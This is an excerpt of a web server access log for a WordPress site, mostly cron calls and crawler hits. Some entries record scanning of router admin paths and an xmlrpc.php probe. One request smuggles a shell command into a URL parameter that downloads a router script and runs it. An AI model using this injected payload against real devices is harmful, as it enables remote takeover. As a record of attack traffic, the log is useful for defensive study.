36.133.115.36 - - [27/Nov/2025:11:00:51 +0800] "POST /wp-cron.php?doing_wp_cron=1764212451.5185239315032958984375 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
54.202.160.179 - - [27/Nov/2025:11:00:51 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
36.133.115.36 - - [27/Nov/2025:11:04:04 +0800] "POST /wp-cron.php?doing_wp_cron=1764212644.8436570167541503906250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
193.142.147.209 - - [27/Nov/2025:11:04:04 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 301 5 "-" "-"
193.142.147.209 - - [27/Nov/2025:11:04:06 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 31381 "http://36.133.115.36:80/cgi-bin/luci/;stok=/locale" "-"
36.133.115.36 - - [27/Nov/2025:11:06:01 +0800] "POST /wp-cron.php?doing_wp_cron=1764212761.0699510574340820312500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
62.210.64.72 - - [27/Nov/2025:11:06:01 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:42.0) Gecko/20100101 Firefox/42.0"
36.133.115.36 - - [27/Nov/2025:11:09:52 +0800] "POST /wp-cron.php?doing_wp_cron=1764212992.7539029121398925781250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
47.128.110.16 - - [27/Nov/2025:11:09:52 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
221.159.119.6 - - [27/Nov/2025:11:26:19 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh) HTTP/1.1" 499 0 "-" "-"
36.133.115.36 - - [27/Nov/2025:11:26:20 +0800] "POST /wp-cron.php?doing_wp_cron=1764213980.3569619655609130859375 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
36.133.115.36 - - [27/Nov/2025:11:29:40 +0800] "POST /wp-cron.php?doing_wp_cron=1764214180.8078989982604980468750 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
204.76.203.212 - - [27/Nov/2025:11:29:41 +0800] "GET / HTTP/1.1" 200 33526 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [27/Nov/2025:11:30:47 +0800] "POST /wp-cron.php?doing_wp_cron=1764214246.9938049316406250000000 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
